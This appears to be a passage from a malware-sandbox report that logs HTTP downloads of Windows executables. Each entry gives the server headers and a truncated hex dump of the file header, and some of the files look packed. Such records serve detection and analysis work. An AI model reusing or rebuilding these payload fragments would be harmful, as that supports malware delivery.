00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 11:59:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 11:59:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 11:59:48 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 11:59:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 07 Dec 2024 11:59:53 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 11:59:58 GMTContent-Type: application/octet-streamContent-Length: 3250176Last-Modified: Sat, 07 Dec 2024 11:47:15 GMTConnection: keep-aliveETag: "675435c3-319800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 a0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 31 00 00 04 00 00 45 1d 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 8a 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 8a 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 88 03 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 78 77 6b 77 6f 6a 68 00 e0 2a 00 00 b0 06 00 00 dc 2a 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 75 78 78 70 78 76 6c 00 10 00 00 00 90 31 00 00 04 00 00 00 72 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 31 00 00 22 00 00 00 76 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 12:00:39 GMTContent-Type: application/octet-streamContent-Length: 1737216Last-Modified: Sat, 07 Dec 2024 10:44:20 GMTConnection: keep-aliveETag: "67542704-1a8200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 d5 1c 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 8c 00 00 00 08 00 00 00 00 00 00 00 e0 44 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 45 00 00 04 00 00 5e 6a 1b 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 e0 00 00 69 00 00 00 00 c0 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 e1 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 a0 00 00 00 20 00 00 00 46 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 34 05 00 00 00 c0 00 00 00 06 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 e0 00 00 00 02 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 00 01 00 00 02 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 63 73 61 7a 77 66 79 00 00 1a 00 00 c0 2a 00 00 ea 19 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 63 72 73 6c 70 6b 00 20 00 00 00 c0 44 00 00 06 00 00 00 5a 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 44 00 00 22 00 00 00 60 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 